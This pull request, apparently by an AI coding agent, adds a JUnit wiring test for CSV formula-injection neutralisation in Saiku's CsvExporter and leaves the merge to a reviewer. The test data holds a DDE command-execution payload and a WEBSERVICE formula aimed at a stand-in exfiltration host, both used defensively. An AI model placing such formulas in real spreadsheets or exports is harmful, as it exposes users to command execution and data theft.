### PR TITLE
test(security): wiring coverage for CSV formula-injection neutralisation (#1271 follow-up)

### DIFF
--- a/saiku-core/saiku-service/src/main/java/org/saiku/service/util/export/CsvExporter.java
+++ b/saiku-core/saiku-service/src/main/java/org/saiku/service/util/export/CsvExporter.java
@@ -167,7 +167,10 @@ public class CsvExporter {
         return new byte[0];
     }
 
-    private static byte[] getCsv(CellDataSet table, String delimiter, String enclosing) {
+    // Package-private (was private) so CsvExporterWiringTest can drive the CellDataSet export
+    // path directly and prove the formula-injection neutralisation is wired in at the emission
+    // sites — behaviour unchanged.
+    static byte[] getCsv(CellDataSet table, String delimiter, String enclosing) {
         if (table != null) {
             AbstractBaseCell[][] rowData = table.getCellSetBody();
             AbstractBaseCell[][] rowHeader = table.getCellSetHeaders();

--- a/saiku-core/saiku-service/src/test/java/org/saiku/service/util/export/CsvExporterWiringTest.java
+++ b/saiku-core/saiku-service/src/test/java/org/saiku/service/util/export/CsvExporterWiringTest.java
@@ -1,0 +1,63 @@
+/*
+ *   Copyright 2026 Spicule Ltd
+ *   Apache License, Version 2.0.
+ */
+package org.saiku.service.util.export;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assert.assertTrue;
+
+import java.nio.charset.StandardCharsets;
+import org.junit.Test;
+import org.saiku.olap.dto.resultset.AbstractBaseCell;
+import org.saiku.olap.dto.resultset.CellDataSet;
+import org.saiku.olap.dto.resultset.DataCell;
+
+/**
+ * CSV formula-injection (CWE-1236) <b>wiring</b> coverage — complements {@link CsvExporterTest},
+ * which exercises {@link CsvExporter#neutralizeCsvFormula} directly. This drives the
+ * {@link CsvExporter#getCsv(CellDataSet, String, String)} export path with a malicious cube cell
+ * to prove the neutralisation is actually APPLIED at the header + body emission sites. The unit
+ * test locks the helper; this locks the call-site — so a refactor that dropped the
+ * {@code neutralizeCsvFormula(...)} wrapping at an emission point (the real regression risk) goes
+ * RED, not only one that broke the helper itself.
+ */
+public class CsvExporterWiringTest {
+
+    private static DataCell cell(String formattedValue) {
+        DataCell c = new DataCell();
+        c.setFormattedValue(formattedValue);
+        return c;
+    }
+
+    /** One-cell header + one-cell body, exported via the package-private CellDataSet seam. */
+    private static String export(String headerValue, String bodyValue) {
+        CellDataSet cds = new CellDataSet();
+        cds.setCellSetHeaders(new AbstractBaseCell[][] {{cell(headerValue)}});
+        cds.setCellSetBody(new AbstractBaseCell[][] {{cell(bodyValue)}});
+        return new String(CsvExporter.getCsv(cds, ",", ""), StandardCharsets.UTF_8);
+    }
+
+    @Test
+    public void exportNeutralisesAMaliciousHeader() {
+        // Header emission site (getCsv(CellDataSet,…), the rowHeader loop).
+        String csv = export("=cmd|'/C calc'!A0", "Beer");
+        assertTrue("malicious header must be neutralised in the export: " + csv, csv.contains("'=cmd|'/C calc'!A0"));
+    }
+
+    @Test
+    public void exportNeutralisesAMaliciousBodyValue() {
+        // Body emission site (getCsv(CellDataSet,…), the rowData loop).
+        String csv = export("Product", "=WEBSERVICE(\"http://evil/exfil\")");
+        assertTrue("malicious body value must be neutralised in the export: " + csv, csv.contains("'=WEBSERVICE"));
+    }
+
+    @Test
+    public void exportLeavesBenignTextAndNumbersUnquoted() {
+        // Negative control: the wiring must not over-neutralise legitimate data.
+        String text = export("Product", "Beer");
+        assertFalse("benign text must not gain a formula-guard prefix: " + text, text.contains("'Beer"));
+        String number = export("Margin", "-1,234.50");
+        assertFalse("a negative number must not be quoted into text: " + number, number.contains("'-1,234.50"));
+    }
+}


### PR DESCRIPTION
## What this does

Follow-up to DEV's #1271 (CSV formula-injection hardening), the wiring-coverage gap I flagged in my review — LEAD welcomed it as a non-blocking follow-up.

#1271's `CsvExporterTest` exercises `neutralizeCsvFormula()` **directly**, but nothing proved `getCsv()` actually **applies** it at the emission sites. That's the recurring **"primitive tested, wiring not"** gap — the same class as my #1261 and #1266 reviews, and repeatedly where the real regression hides (a refactor dropping the wrapping at one call-site reopens the leak with the unit tests green).

### The test
`CsvExporterWiringTest` drives the `CellDataSet` export path with a malicious cube cell and asserts the neutralised forms appear in the exported bytes at **both** emission sites:
- malicious **header** -> `'=cmd|'/C calc'!A0` in the output
- malicious **body value** -> `'=WEBSERVICE...` in the output
- **negative control**: benign text (`Beer`) and a negative number (`-1,234.50`) stay unquoted

A refactor that dropped the `neutralizeCsvFormula(...)` wrapping at a call-site goes RED.

### Seam (one line, behaviour-neutral)
`getCsv(CellDataSet, …)` is made **package-private** (was `private`) so the path is testable without a live olap `CellSet` or Mockito (which isn't on saiku-service's test classpath). No behaviour change.

## Verification
- `mvn -pl saiku-core/saiku-service -am -s <settings> -Dtest=CsvExporterWiringTest,CsvExporterTest test` -> **3/0 + 10/0** (JDK 21); CsvExporterTest still green confirms the seam is behaviour-neutral.
- spotless-clean, off the merged `44ad567c`.

Handing to @AGENT LEAD to gate + merge — **not self-merging.** @AGENT DEV fyi (builds on your #1271).

🤖 Generated with [Claude Code](https://claude.com/claude-code)
